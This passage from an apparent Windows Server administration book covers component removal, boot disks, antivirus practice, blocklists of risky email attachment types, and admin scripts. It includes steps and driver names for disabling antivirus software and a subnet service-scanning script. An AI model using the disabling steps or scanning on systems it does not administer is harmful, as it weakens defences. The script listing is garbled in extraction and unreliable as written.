+environment! For more helpful information on using SysPrep, see
+my column at myITforum.com (http://www.myitforum.com).
+Janis Keim
+
+Hack 66 Remove Windows Components
+from the Command Line
+Here's a handy utility you can use from the command line to
+remove Windows components and protected files.
+When asked to remove simple game files from a company's
+workstations, I replied quickly that it would not be a problem.
+After all, how tough could it be to delete four executables and
+their shortcuts? Well, on Windows 2000/XP machines, it can be
+a little difficult. When you try to delete the files, the OS will see
+that those files are missing and will replace them (or restrict you
+from deleting them). Why the files sol.exe, freecell.exe, and so on
+are considered critical system files is beyond me, but in order to
+get rid of them you will need to use the sysocmgr.exe utility.
+The sysocmgr.exe tool is used to add or remove windows
+components. This utility takes advantage of an answer.txt file
+that can be scripted and pushed via Systems Management
+Server (SMS) and other methods. For the purposes of this hack,
+we will use the answer.txt to remove four famous games from the
+computer. In our case, the answer.txt file will look something like
+this:
+[Components]
+solitaire = off
+freecell = off
+
+pinball = off
+minesweeper = off
+The utility will parse only the [Components] and
+[NetOptionalComponents] sections of the file, so you can easily
+wrap it in with other answer files or inf files.
+Running the Hack
+The command line for the utility has several switches, but these
+are the most important ones for our example:
+/i
+The location of the inf for sysocmgr.exe. This is different
+than the answer file and is normally in the System32
+directory.
+/q
+Runs the utility in quiet mode to suppress prompts.
+/r
+Suppresses a reboot (if required).
+
+/u
+Specifies the location of the answer (unattended) file.
+/w
+Prompts the user to reboot instead of rebooting
+automatically (if required).
+Putting it all together, our command line to remove the games
+components on Windows 2000/XP machines looks like this:
+sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\UnattendSetup\answer.txt /q
+Removing these four games does not require a reboot, so we
+didn't bother to put in the any of the reboot switches.
+Hopefully, this will prove useful in your environment; but, as
+always, test first.
+Donnie Taylor
+
+Hack 67 Unattended Installation of
+Windows Components
+Here's a simple way you can add or remove system components
+when deploying Windows 2000 and later.
+If you're responsible for administering a large number of
+computers, you appreciate methods of automating common
+administrative tasks. A need to add or remove individual system
+components might result from a change in corporate policy,
+discovery of security vulnerability, or simply a newly emerged
+business need. Using sneakernet for such tasks might take
+considerable amount of time.
+Fortunately, Microsoft provides a way to accomplish this task in
+an unattended way. Windows 2000 and XP contain the
+SYSOCMGR.EXE file in the %systemroot%\system32 folder. When
+executed, this command-line utility analyzes the content of two
+files: sysoc.inf (the existing configuration file, located in
+%systemroot%\inf folder) and a specially formatted text file
+(which you can give an arbitrary name) that contains a listing of
+components to be added or removed.
+The sysoc.inf file is used by Windows when running the
+Add/Remove Programs applet in the Control Panel. It's format is
+typical of standard .inf files: it is divided into several sections,
+each starting with a name enclosed in square brackets. The
+[Components] section consists of multiple lines, one per
+component. Each line starts with the component name, followed
+
+by references to .dll and .inf files used during installation or
+uninstallation. Hide entry determines whether the component
+appears in Add/Remove Programs applet.
+The second text file (which you need to create) can have an
+arbitrarily chosen name; for example, c:\comp.txt will do nicely.
+This file can be created using Notepad and should contain the
+[Components] section, followed by one or more lines of the
+following format:
+Component_Name = On/Off
+Here, On is used for installation and Off is used for uninstallation.
+For example, to remove Windows Messenger and add Faxing, the
+file should contain the following lines:
+[Components]
+Msmsgs=Off
+Fax=On
+You can also install optional networking components by
+including the line Netoc=On and the additional section
+[NetOptionalComponents]. This section would contain lines that
+refer to different networking components, such as SimpTcp or wins,
+like so:
+SimpTcp=1
+wins=1
+A value of 1 causes installation and 0 causes uninstallation. The
+names of the components are the same as the ones used during
+unattended installation of the operating system, which are
+documented in the Unattended.doc file on the Windows
+
+installation CD in the Support\Tools folder.
+Running the Hack
+Once you've created your Comp.txt file, you can now use
+sysocmgr.exe in unattended installation mode to add or remove
+Windows components. Simply run the following command:
+SYSOCMGR.EXE /i:%windir%\inf\sysoc.inf /u:c:\comp.txt
+Note that this approach will not work with the COM+, Distributed
+Transaction Coordinator, Microsoft Fax, and Windows Media
+Player services, because these components are not removable.
+Marcin Policht
+
+Hack 68 Easily Create a Network Boot
+Disk
+One of the headaches of deploying Windows is creating network
+boot disks. Here's a speedy solution.
+Creating a network boot disk is not very difficult, but it always
+seems to take longer than it should. The Instant Network Boot
+Disk from Qual-IT removes the hassle.
+The Instant Network Boot Disk works with most network cards.
+It quickly provides network access, and it includes filesystem
+tools and other network utilities. The tool provides full support
+for Windows 9x, NT, 2000, and XP platforms and includes
+multinational keyboard support, advanced memory configuration,
+and a debug mode for troubleshooting drivers that refuse to load.
+The disk loads completely into RAM for ultra-fast performance
+and includes support for static IP addresses or DHCP and built-
+in PCMCIA support for some PCMCIA drivers. It also includes
+PING- and IPCONFIG-compatible utilities and lets you preconfigure
+your network adapter settings.
+To use the tool, first go to the Qual-IT web site at
+http://www.qualit-uk.com and click the Tools menu option. Find
+the latest version of Instant Network Boot Disk and download it
+to your machine. To create a network boot disk, you need a blank
+floppy and the appropriate driver for your network card.
+The steps for creating a boot disk are simple. First, run the tool
+
+to create a generic boot disk and then copy your NIC driver to
+the disk. If space is an issue, delete the included drivers to
+make room for new ones you need. Now, reboot from the disk and
+select the "CONFIGURE THIS DISK" option when it appears.
+Provide the required setup informationfor example, the
+hostname, the IP address or using DHCP, your NIC card, and so
+on. Now, save your settings and reboot.
+Detailed configuration and troubleshooting information is
+included on the disk in the readme.txt file. I've found this utility
+to be a real time- and headache-saver. Add it to your list of tools
+today!
+Patrick Sklodowski
+
+Chapter 8. Security
+Hacks #69-78
+Section 69. Fundamentals of a Virus-Free Network
+Section 70. Antivirus FAQ
+Section 71. Rename the Administrator and Guest
+Accounts
+Section 72. Get a List of Local Administrators
+Section 73. Find All Computers that Are Running a
+Service
+Section 74. Grant Administrative Access to a Domain
+Controller
+Section 75. Secure Backups
+Section 76. Find Computers with Automatic logon
+Enabled
+Section 77. Security FAQ
+Section 78. Microsoft Security Tools
+
+Hacks #69-78
+Probably no aspect of the system administrator's job is more
+important these days than security, and this is especially so
+with systems running Windows. The ever-increasing threats of
+viruses, worms, Trojans, and other exploits means
+administrators have to spend time and energy learning how to
+protect their company's networks against the wiles of malicious
+hackers on the Internet.
+This chapter looks at some of the ways you can protect your
+network from these threats, and includes topics like best
+practices in virus protection, protecting Administrator accounts,
+securing backups, protecting domain controllers, and finding
+machines with automatic logon enabled. A security FAQ and a
+review of security tools you can download from Microsoft's web
+site round of this chapter and help you build an arsenal of best
+practices and tools that can help keep your network secure. For
+additional security hacks on the topic of deploying and managing
+security fixes on your network, see Chapter 9.
+
+Hack 69 Fundamentals of a Virus-Free
+Network
+Here are some fundamentals you need to pay attention to if you
+want to keep your network free of viruses.
+This hack details some of the fundamentals of having a virus-
+free network, which I have identified through trial, error, and
+observation in the almost three years of working in the dual role
+of SMS/Virus Protection Administrator for my employer. As a
+result, we've had zero network downtime due to virus infection
+since January of 2000 until now (December 2003).
+Awareness
+The first fundamental is awareness. Simply put: you can't protect
+your network against a threat if you don't know the threat exists.
+Administrators need to keep up-to-date on viruses, current
+virus trends, and application and operating-system security
+vulnerabilities. How aware an administrator is about these
+subjects is very important, because it effects all the decisions
+that an administrator will make to protect a network from
+viruses.
+There are several ways to gain awareness if network threats. For
+information on viruses and virus trends, the web sites of
+
+antivirus software vendors are the best place to start (I will
+discuss antivirus software shortly). All of those companies have
+some kind of virus-information section on their web sites.
+I recommend checking the web site that corresponds with the
+antivirus software that your company uses several times a day
+(every couple of hours is even better). Virus writers are getting
+smarter and more devious everyday, and another virus like
+Nimda or Blaster could spread across the globe in a matter of
+hours or even minutes if given the right conditions. The more
+often you check, the better chance you have of getting a heads
+up on the next virus that goes worldwide.
+Since antivirus vendors partly rate the threat level of a virus on
+how many samples of a virus have been submitted to them by
+their customers, it is also a good idea to check more than one
+web site for virus information. I recommend checking out two or
+three, just to keep an eye on things.
+Here are a few good antivirus web sites:
+Symantec (http://securityresponse.symantec.com)
+Network Associates (http://vil.nai.com/vil/newly-
+discovered-viruses.asp)
+Trend Micro (http://www.trendmicro.com/vinfo)
+Computer Associates (http://www3.ca.com/virusinfo)
+F-Secure (http://www3.ca.com/virusinfo)
+I usually concentrate on Symantec, Network Associates, and
+Trend Micro's web sites. According to the latest ICSA Labs
+2002 Virus Prevalence Survey
+(http://www.icsalabs.com/2002avpsurvey/index.shtml), these
+three companies make up about 89% of the global antivirus
+software market share. If a new worldwide virus outbreak
+happens, one of these three companies is probably going to be
+the first to have information on it.
+
+Microsoft has also recently started an Antivirus Information web
+site (http://www.microsoft.com/security/antivirus/) to provide
+one place for information on viruses that involve security
+vulnerabilities in their software or operating systems. This is
+also an excellent source of information for using Microsoft
+products to help you keep viruses from infecting your network.
+Microsoft also has a Knowledge Base article that lists other
+antivirus software vendors
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;Q49500).
+For application and operating-system security vulnerabilities, I
+recommend signing up for the NTBugtraq mailing list
+(http://www.ntbugtraq.com). If a security vulnerability comes
+out, you can usually read it on this list before you will see it
+anywhere else. Other good web sites include SecurityFocus
+(http://www.securityfocus.com), CERT Coordination Center
+(http://www.cert.org), and TruSecure's ICSA Labs
+(http://www.icsalabs.com).
+I also recommend signing up for Microsoft's Security
+Notification Service
+(http://www.microsoft.com/technet/security/bulletin/notify.asp),
+which will notify you via email each time a security vulnerability
+from Microsoft is announced and will provide information if there
+is a fix.
+The complexities of viruses are increasing every day, as the
+Nimda and Blaster viruses have taught us all. The vulnerabilities
+that Nimda used to propagate were several months old when that
+virus went worldwide. The Blaster virus taught us this lesson
+again as it spread globally less than a month after the
+vulnerabilities it used were announced. If more administrators
+had been aware of those vulnerabilities, then Nimda and Blaster
+would not have had as big an impact as they did. The lesson to
+learn here is this: to win the war against viruses, awareness is
+
+the first weapon that you should have in your arsenal.
+Antivirus Software
+The second fundamental for a virus-free network is antivirus
+software. Now this might seem pretty obvious; anyone who has
+worked in the Information Technology game long enough knows
+that antivirus software is essential, especially with viruses
+increasing in sophistication everyday. However, which features
+to look for in corporate antivirus software might not be quite so
+obvious.
+The following list of features are things I have identified in my
+experience to be most helpful in enterprise antivirus software:
+Certification
+Look for a product that has been certified for use with
+the operating systems you are using. ICSA Labs
+(http://www.icsalabs.com) is a good place to look.
+Easy to update
+One of the most important things to look for is antivirus
+software that makes it easy to update virus definitions.
+Antivirus software that requires updates to be deployed
+with third-party software distribution or any other means
+that are separate from the antivirus software's own
+processes can lead to logistical problems when
+deploying the updates, depending on the size of the
+network environment and the method of deployment.
+
+Antivirus software with some kind of built-in update
+process is much more desirable. Also, antivirus software
+that has updates that require user intervention or a
+reboot to install can lead to similar logistical problems.
+A built-in, automated, and silent update delivery system
+will yield much better results and ensure that the
+software is updated properly.
+Frequency of updates
+When checking out antivirus software, take a look at the
+company's web site to see how often they provide
+updates and how they handle virus definition files in
+emergencies. Make sure that their policy meets the
+needs of your environment.
+Centralized configuration
+Antivirus software that has the ability to configure all
+the clients on your network from one centralized console
+is a lot easier to manage and helps ensure that
+configuration is consistent.
+Real-time background scanning
+Antivirus software that has the ability to scan files in the
+background, without user intervention, is essential in
+today's virus environment. Being able to configure which
+files the software scans in the background is also
+important.
+
+Heuristic capability
+Antivirus software that has the ability to detect virus-
+like behavior in a file's operation could help identify new
+viruses and new variants of already-discovered viruses.
+Remote scanning capability
+If you have a virus incident on your hands, the ability to
+initiate a scan remotely on one workstation or server,
+and the entire network if necessary, could be what keeps
+your network from getting damaged due to a virus
+infection.
+Alerting capability
+With the speed that viruses spread these days, it is
+essential to have antivirus software that is able to send
+alerts when a computer virus is found. Without this
+functionality, you could have viruses hitting every
+workstation and server on your network and you wouldn't
+know about it.
+Support for mobile computers
+Not many businesses today can survive with out
+laptops. If at all possible, look for software that is able
+to handle updating computers that are constantly
+mobile.
+
+Reporting capability
+If you work for anyone that has Manager in her title, then
+you are going to have to produce some kind of report on
+virus activity at one time or another. Help yourself out by
+looking for antivirus software that can create those
+reports for you.
+This list is by no means exclusive. Some of the things I have
+listed here might not be important to you at all, and I might not
+have included things that you consider important. The list of
+essential features depends on the networking environment you
+are working in and the operating systems that you have to
+support. Hopefully, this list will lead you in the right direction if
+you are considering your own needs for antivirus software.
+Interception
+The third fundamental of a virus-free network is interception.
+Simply put: a user can't execute a virus if the virus isn't there.
+In the current environment of viruses, things can change
+quickly. Since a large percentage of viruses in the wild propagate
+through email these days, a new virus can spread worldwide in a
+few hours under the right conditions. Depending on the virus,
+sometimes it takes antivirus software companies several hours
+to come up with virus-definition files that can contain a new
+worldwide threat. The best way to protect your network from new
+virus threats like this is to block all incoming instances of the
+file types that are known to propagate viruses from reaching
+your corporate email system.
+Now, some would tell you just to block certain files or certain
+subject lines in emails, because the thought of blocking too
+
+much email would cause too many problems. Back when the
+Loveletter virus came out, this might have been a viable option.
+Now it is not. The sophistication of viruses has increased, and
+now just about everything a virus generates is random. (A good
+example is the W32.Klez.H@mm virus; see
+http://securityresponse.symantec.com/avcenter/venc/data/w32.klez.h@mm.html
+The only common thread you can use is the file types that
+viruses themselves use.
+Are legitimate files going to stopped by using this method? Yes,
+they will. However, the rewards greatly outweigh the minor
+inconvenience that this method might cause your user base. In
+the almost three years I worked in my previous job, we stopped
+over 7,300 viruses. From that number, I would say that over
+90% of the viruses that we stopped were volatile email
+attachments. On several occasions, using this method
+protected us from worldwide virus threats before antivirus
+vendors were able to provide new virus-definition files.
+With all of this in mind, the next thing to think about is which file
+types need to be blocked. A good place to start is the files that
+are restricted from being accessed after the Outlook 98/2000
+E-Mail Security Update
+(http://office.microsoft.com/assistance/preview.aspx?
+AssetID=HA010550011033&CTT=6) has been installed (this
+is functionality is embedded into Office XP):
+.ade
+Microsoft Access project extension
+.adp
+
+Microsoft Access project
+.bas
+Visual Basic class module
+.bat
+Batch file
+.chm
+Compiled HTML Help file
+.cmd
+Windows NT command script
+.com
+MS-DOS application
+.cpl
+Control Panel extension
+
+.crt
+Security certificate
+.ext
+Application
+.hlp
+Windows Help file
+.hta
+HTML applications
+.inf
+Setup information file
+.ins
+Internet communication settings
+.isp
+Internet communication settings
+
+.js
+JScript file
+.jse
+JScript encoded script file
+.lnk
+Shortcut
+.mdb
+Microsoft Access application
+.mde
+Microsoft Access MDE database
+.msc
+Microsoft common console document
+.msi
+
+Windows Installer package
+.msp
+Windows Installer patch
+.mst
+Visual test source file
+.pcd
+Photo CD image
+.pif
+Shortcut to MS-DOS program
+.reg
+Registration entries
+.scr
+Screen saver
+
+.sct
+Windows Script Component
+.shs
+Shell Scrap object
+.url
+Internet shortcut
+.vb
+VBScript file
+.vbe
+VBScript encoded script file
+.vbs
+VBScript script file
+.wsc
+Windows script component
+
+.wsf
+Windows script file
+.wsh
+Windows Scripting Host settings file
+At my organization, we use a large part of this list, in addition to
+other files we feel could pose a potential threat in the future due
+to their nature. For example, we also restrict the following files:
+.ocx
+Active X control
+.swf
+Shockwave Flash object
+.wmv
+Windows Media audio/video file
+The way in which this policy is implemented depends on the
+configuration of your network and which security measures that
+you currently use. For an additional perspective on which file
+types to block, see the following section.
+
+Blocking potentially unsafe email attachments is by no means
+the only security measure that you should take to protect your
+network from viruses. However, if you add this protection to what
+I have outlined here, you will have strong groundwork that could
+protect you from the next virus threat. Be sure to check out my
+column at myITforum.com (http://www.myitforum.com) for more
+tips on keeping your network virus-free.
+Interception Redux
+Here's another perspective (mine, Brian Rogers) on how to keep
+your network free of viruses by configuring your antivirus
+software to block certain file types.
+I'd like to share my own recommendations for file types that
+should be blocked to keep your network free of viruses. I posted
+this list to the AntiVirus discussion forum at myITforum.com
+(http://www.myitforum.com) awhile back. I compiled my list from
+various web sites and added a few of my own:
+.bas
+Microsoft Visual Basic class module
+.bat
+Batch file
+.cab
+
+Cabinet installation file
+.chm
+Compiled HTML help file
+.cmd
+Microsoft Windows NT command script
+.com
+Microsoft MS-DOS program
+.cpl
+Control Panel extension
+.crt
+Security certificate
+.exe
+Program
+
+.hlp
+Help file
+.hta
+HTML program
+.inf
+Setup Information
+.ins
+Internet Naming Service
+.isp
+Internet Communication settings
+.js
+JScript file
+.jse
+Jscript Encoded Script file
+
+.lnk
+Shortcut
+.mde
+Microsoft Access MDE database
+.msc
+Microsoft Common Console document
+.msi
+Microsoft Windows Installer package
+.msp
+Microsoft Windows Installer patch
+.mst
+Microsoft Visual Test source files
+.pcd
+
+Photo CD image, Microsoft Visual compiled script
+.pif
+Shortcut to MS-DOS program
+.reg
+Registration entries
+.scr
+Screen saver
+.sct
+Windows Script component
+.shs
+Shell Scrap object
+.shb
+Shell Scrap object
+
+.url
+Internet shortcut
+.vb
+VBScript file
+.vbe
+VBScript Encoded script file
+.vbs
+VBScript file
+.wsc
+Windows Script Component
+.wsf
+Windows Script file
+.wsh
+Windows Script Host Settings file
+
+Ever since we blocked attachments with these extensions, we
+haven't had a single virus infection via email.
+Chris Mosby and Brian Rogers
+
+Hack 70 Antivirus FAQ
+Rod Trent of myITforum.com, shares his answers to some
+frequently asked questions on the subject of virus protection.
+As CEO of myITforum.com (http://www.myitforum.com) and
+author of several white papers on security topics, I frequently
+get questions on protecting Microsoft platforms from viruses,
+worms, and other threats. Here's a short selection of some
+questions and my answers. By the way, you can find lots of
+additional information about protecting your networks at
+myITforum.com.
+Is It Real or a Hoax?
+Q: How can you tell whether a virus threat is real or just a hoax?
+A: Keep the following links handy the next time a user sends you
+an email saying that one of their AOL buddies alerted them to a
+new and threatening virus. These links should be your first line
+of defense when a new virus is reported in the wild:
+CERT Institute (http://www.cert.org)
+McAfee's Virus Hoaxes
+(http://vil.mcafee.com/hoax.asp)
+Symantec's Hoax Page
+(http://www.symantec.com/avcenter/hoax.html)
+
+TrendMicro Hoax Page
+(http://www.antivirus.com/vinfo/hoaxes/hoax.asp)
+Sophos' Hoax Page
+(http://www.sophos.com/virusinfo/hoaxes/)
+Virus Busters (http://www.itd.umich.edu/virusbusters/)
+Virus Myths (http://www.stiller.com/myths.htm)
+Hoax Warnings
+(http://www.europe.datafellows.com/news/hoax.htm)
+Disabling Antivirus Programs Is Not
+Enough
+Q: How can I disable my antivirus software temporarily when I
+need to troubleshoot some problem on my system?
+A: Occasionally, you might be forced to disable antivirus
+software temporarily to troubleshoot problems with applications,
+printing, or the OS itself. On Windows 2000 computers, just
+shutting down the virus engine service is not enough to disable
+it temporarily. You also have to disable the device drivers
+associated with the antivirus software.
+Here's how to temporarily disable popular antivirus products on
+Windows 2000. Right-click on My Computer and select
+Properties. Click the Hardware tab and click the Device Manager
+button. Click the View menu and click Show Hidden Devices.
+Now, expand Non-Plug and Play Drivers to find the Antivirus
+drivers on your system. Right-click on the correct driver and
+click Disable.
+Table 8-1 identifies the names of the device drivers that
+correspond with products from popular antivirus software
+vendors. Note, however, that the device drivers for each
+
+application can change, so be sure to verify these device drivers
+at the appropriate vendors' web sites.
+Table 8-1. Device drivers for antivirus software
+products
+Vendor Device drivers
+Symantec symevent.sys
+McAfee NaiFiltr and NaiFsRec
+Norton NAVAP, NAVENG, and NAVEX15
+Inoculan INO_FLPY and INO_Fltr
+Kernel32.exe Has Encountered a Problem
+Q: I get an error message saying that Kernel32.exe is encountering
+a problem. Is that a system glitch or a virus?
+A: If you receive error messages about Kernel32.exe
+encountering a problem, you need to update your antivirus
+program, because Kernel32.exe is not a Microsoft file (though
+Kernel32.DLL is). So, if you see this error message, quickly
+update your antivirus program and attempt to fix the virus
+outbreak on the computer.
+
+This issue can occur if your computer is infected by one of the
+following viruses: Worm_Badtrans.b, Backdoor.G_Door, Glacier
+Backdoor, Win32.Badtrans.29020, W32.Badtrans.B@mm, and
+Win32/PWS.Badtrans.B.Worm.
+Stinger Tool
+Q: Is there a virus-removal tool that can remove multiple viruses,
+instead of the single tools offered by vendors?
+A: On the McAfee help forums, you'll find information on a
+removal utility called Stinger. This tool is constantly updated to
+include new removal information for new viruses. You can find
+more information about Stinger at
+http://forums.mcafeehelp.com/viewtopic.php?t=764, and you
+can download the tool from http://vil.nai.com/vil/stinger/.
+Rod Trent
+
+Hack 71 Rename the Administrator and
+Guest Accounts
+Renaming the default administrator and guest accounts is a
+simple but effective step to help secure your machines.
+To enhance system security on your Windows server-based
+network, you should rename the administrator account. You
+should choose a name that does not identify it as an
+administrator account, to make it difficult for any unauthorized
+user to break into the computer or network. One of the account
+settings in Windows 2000/2003 allows you to enter an account
+name to rename the administrator and guest accounts
+automatically using Local Security Policy (for standalone
+machines in a workgroup) or Group Policy (in an Active
+Directory environment).
+To access local policy settings, click Start Run, type mmc,
+and press Enter. Select File Add/Remove Snap-in. Click the
+Add button, scroll through the list until you see Group Policy (in
+Windows 2000) or Group Policy Object Editor (in Windows
+Server 2003). Click add, then finish (the default is to manage
+Local Computer). Expand Local Computer Policy, Computer
+Configuration, Windows Settings, Security Settings, Local
+Policies, and Security Options. If you like, you can save this
+console with a familiar name to have this MMC snap-in available
+for future use. Once you've selected Security Options, you
+should see a screen similar to Figure 8-1 (if you're running
+
+Windows Server 2003 or Windows XP).
+Figure 8-1. Policy settings for the default
+administrator and guest accounts in Windows
+Server 2003 and Windows XP
+In the pane on the right, you can see that the first five options
+detail policies for Accounts. The last two options in the
+Accounts section are used to rename the administrator account
+
+and rename the guest account. Clicking on "Accounts: Rename
+administrator account" brings up the screen shown in Figure 8-
+2. You will see a similar screen if you select the Guest option.
+Simply type whatever name you want to use and click OK. This
+automatically renames the administrator or guest accounts.
+Figure 8-2. Renaming the default Administrator
+account
+Some Considerations
+Note that if your machine belongs to a domain, the local policy
+settings you configure using the previous method might be
+overwritten by any Group Policy settings defined at the domain,
+organizational unit (OU), or site level.
+Windows 2000 provides only the first two Accounts policy
+settings and they're named differently than the settings shown in
+
+Figure 8-2. The Windows Server 2003 setting named
+"Accounts: Rename administrator account" is simply named
+"Rename administrator account" in Windows 2000, and likewise
+with the Guest account policy setting. Windows XP, however, is
+identical to Windows Server 2003 in this regard.
+Finally, as a further security precaution, after you rename the
+accounts, you might want to add another administrator and
+guest account (through the User Accounts option). Once you
+create these accounts, give them a secure password, but give
+the accounts no rights to anything. Even if the administrator and
+guest accounts are compromised, the potential intruder will have
+no rights to do anything to the computer.
+John Gormly
+
+Hack 72 Get a List of Local
+Administrators
+Local administrators can do anything on their machines. Here's a
+quick way to determine who has this power.
+When an intruder penetrates a network's defenses, the intruder
+generally tries to elevate the privileges of his account to that of
+local administrator on the machine. Once the intruder has
+achieved this, he can do anything he wants to do on the
+machine.
+So, if you think your network defenses have been penetrated, it's
+a good idea during the triage stage to check which accounts are
+local administrators on your machines. Using the GUI, this can
+be done using the Local Users and Groups node in Computer
+Management, but that is tedious.
+A faster way to identify individuals who have local computer
+administrator rights is to use the following VBScript, which you
+can customize further as desired.
+The Code
+Just open a text editor such as Notepad (make sure you have
+Word Wrap disabled), type the following code, and save it with a
+.vbs extension as GetAdmins.vbs:
+
+computername = createobject("wscript.network").computername
+set group = getobject("WinNT://" & computername & "/administrators,group")
+s = ""
+for each account in group.members
+s = s & account.name & vbcrlf
+next
+msgbox s
+Running the Hack
+Running the hack is simple. Just create a shortcut to it and
+double-click on the shortcut. A dialog box will display which user
+accounts are local administrators on the machine, as shown in
+Figure 8-3. From this list, you can easily detect any
+unauthorized administrator-level accounts, such as backd00r,
+that might indicate that the system has been compromised by a
+malicious hacker.
+Figure 8-3. A list of local administrators on a
+member server
+
+Make sure you have the latest scripting engines on the
+workstation from which you run this script. Download the latest
+scripting engines from the Microsoft Scripting home page
+(http://msdn.microsoft.com/library/default.asp?
+url=/nhp/default.asp?contentid=28001169). Note also that,
+when working with the Active Directory Services Interface
+(ADSI) you must have the same applicable rights you need to
+use the built-in administrative tools.
+Hacking the Hack
+The script gets the contents of the local administrators group,
+but you can easily alter the group information in the script to
+retrieve the information from any local computer group if you
+desire. For example, to display members of the Users group just
+change this line:
+set group = getobject("WinNT://" & computername & "/administrators,group")
+to this:
+set group = getobject("WinNT://" & computername & "/users,group")
+
+Then, run the hack again.
+Rod Trent
+
+Hack 73 Find All Computers that Are
+Running a Service
+Use this script to find rogue web servers, misconfigured clients,
+and other potentially insecure systems on your network.
+Querying the status of a service across multiple computers can
+be an extremely useful tool. You can check for the SMS client
+service, antivirus services, or even viruses/Trojans that run as a
+service. Under most interfaces, such as WMI or ADSI, you need
+to check the status of services with an account that has
+administrator rights on the machine you are targeting. It turns
+out that in many organizations there are quite a few PCs on the
+network that have done a phenomenal job of removing most of
+the IT department's administrator rights. These unmanaged PCs
+can be a real risk at times.
+One day, I noticed that when you query a remote box with the
+Windows 2000 services snap-in for the MMC, you do not need
+administrator rights to check on the services that reside on
+remote boxes. You simply need an account in a trusted domain
+with simple user-level rights. On further investigation, it was
+revealed that what in fact was going on was a direct query to the
+Service Control Manager (SCM), as opposed to some API call
+through WMI or ADSI. One of the best free third-party tools that
+also queries the SCM is Psservice from Sysinternals
+(http://www.sysinternals.com). Although this is strictly a
+command-line utility, we can tweak it with some parameters and
+do some fancy parsing to make efficient use of it in a script.
+
+First, the script will search IP addresses by subnet, using a ping
+response, and find the Windows-based machines by parsing out
+a NetBIOS call. Then, it will determine if the machine is running
+a particular service, by querying it with Psservice, and log the
+results in tab-delimited format. This will retrieve the following
+data in the log file: IP address, computer name, currently
+logged-on user, domain or workgroup to which the machine is
+joined, and the status of the service. The IP address is included
+even if the node is not pingable and can be treated as a key in
+most cases. The computer name is resolved with a DNS lookup
+on the IP address and then, if a NetBIOS name is found, it is
+switched to that name. Note that this could be blank if both
+methods fail. The currently logged-on user field should display
+data if the machine is NetBIOS-compatible and someone is
+currently logged on. However, if no one is logged on, it will be
+blank. Note that this logon name could be a domain account or a
+local account; there is no way to tell. The domain (or workgroup)
+to which the machine is joined is the domain (or workgroup)
+associated with the computer account, not the user account.
+The status of the service can be any of seven possible values,
+as shown in Table 8-2.
+Table 8-2. Possible values for server status
+Status Description
+UnPingable The IP address does not respond
+RUNNING Service is running
+STOPPED Service is stopped
+
+PENDING Service is starting or stopping
+Blank Service does not exist
+Your account does not have minimal user-
+Access is Denied
+level rights to the box
+The RPC server is Computer is running Win9x,Win 3.x, or is a
+unavailable Samba box
+There are several items you will need before the script will run.
+First, you need the Psservice utility that comes with the Pstools
+suite from Sysinternals. Place the psservice.exe utility in the
+same directory as the script itself. You also need to register the
+free System Scripting Runtime COM object from Netal
+(http://www.netal.com/ssr.htm). To register the COM object,
+copy the DLL to your system32 directory and use regsvr32 to
+register it. You'll need to do this for every box you run the script
+from, but this does not need to be done on the remote machines.
+By the way, I highly suggest reading through the documentation
+on both of these valuable pieces of software.
+The Code
+Type the following script into Notepad (with Word Wrap disabled)
+and save as FindNTService.vbs. Alternatively, since this is a long
+one, you're probably better off downloading the source from
+http://www.oreilly.com/catalog/winsvrhks/.
+
+' Dennis Abbott - speckled_trout@hotmail.com
+' you need to register the Scripting System Runtime from www.netal.com in
+' your System32 directory on the machine you are running this script from
+' first.
+' You also need the utility psservice.exe from www.sysinternals.com in
+' the same directory as this script and you need a text file with the
+' subnets listed with a linefeed after each subnet.
+'
+' example of subnet listing
+'
+' 192.168.0.0
+' 192.168.1.0
+' 34.54.78.0
+'
+' You can view the script in action by opening the log file with a
+' realtime log file viewer such as SMS Trace from Mircosoft.
+'
+'On Error Resume Next
+
+Option Explicit
+Dim Title 'used for dialog boxes as well as the log file name
+Dim PathToScript 'path to the directory that the script is running from
+Dim PathToLogFile 'full path including filename of the log file
+Dim WshShell 'shell object
+Dim WshNet 'network object
+Dim WshFso 'file system object
+Dim WshSysEnv 'environment variable object
+Dim ScriptNet 'System Scripting Runtime object from www.netal.com
+Dim ComSpec 'path to cmd.exe
+Dim DataFile 'file containing machine names
+Dim LogFile 'log file for stats
+Dim CompName 'name of the current remote target computer
+Dim User 'user logged on to remote computer
+Dim Domain 'domain that the remote computer is joined to
+Dim IP 'IP address of remote computer
+Dim CurLine 'used when parsing text files
+
+Dim NbtFile 'file parsed for NetBIOS information
+Dim SubnetFileName 'file containing subnets to be searched
+Dim I 'counter
+Dim SysFolder 'the system folder
+Dim TimeOut 'timeout in milliseconds for ping
+Dim Go 'gives user option to quit
+Dim ServiceToCheck 'name of the service to look for--NOT THE DISPLAY NAME
+Dim EditSubnets 'give user option of editing subnet file
+Dim File 'File object
+Dim Subnet 'current subnet being searched
+Dim Service 'Status of the service
+Dim ServFile 'file parsed for the service information
+Set WshShell = CreateObject("WScript.Shell")
+Set WshFso = CreateObject("Scripting.FileSystemObject")
+Set WshNet = CreateObject("WScript.Network")
+Set ScriptNet = CreateObject("SScripting.IPNetwork")
+
+SysFolder = WshFso.GetSpecialFolder(1)
+PathToScript = Left(WScript.ScriptFullName, & _
+(Len(WScript.ScriptFullName) - (Len(WScript.ScriptName) + 1)))
+Title = "FindNTService"
+Set WshSysEnv = WshShell.Environment("SYSTEM")
+ComSpec = WshSysEnv("COMSPEC")
+Timeout = 125
+'collect input
+Go = MsgBox("This utility will search the network by subnet to find " & _
+"all machines running a particular service." & vbcrlf & _
+"To do this you must supply a text file with the subnets and the name of " & _
+"the service." & vbcrlf & vbcrlf & "Do you wish to continue?",vbyesno,Title)
+Select Case Go
+Case VbYes
+Case VbNo Wscript.Quit(0)
+End Select
+
+If WshFso.FileExists(PathToScript & "\psservice.exe") <> True Then
+MsgBox "The PSSERVICE utility does not exist....GOODBYE" & vbcrlf & _
+"You can get PSSERVICE from www.sysinternals.com",vbok + vbcritical, _
+Title Wscript.Quit(0)
+End If
+If WshFso.FileExists(SysFolder & "\sscrrun.dll") <> True Then
+MsgBox "The sscrrun.dll does not exist....GOODBYE" & vbcrlf & "You can
+get sscrrun.dll from www.netal.com",vbok + vbcritical, Title
+Wscript.Quit(0)
+End If
+ServiceToCheck = InputBox("enter the service name(not display name) that " & _
+"you want to search for.",Title,"w3svc")
+If ServiceToCheck = "" Then
+MsgBox "you did not enter a service name....GOODBYE",vbok + vbcritical, Title
+Wscript.Quit(0)
+End If
+SubnetFileName = InputBox("enter the path to the file that contains " & _
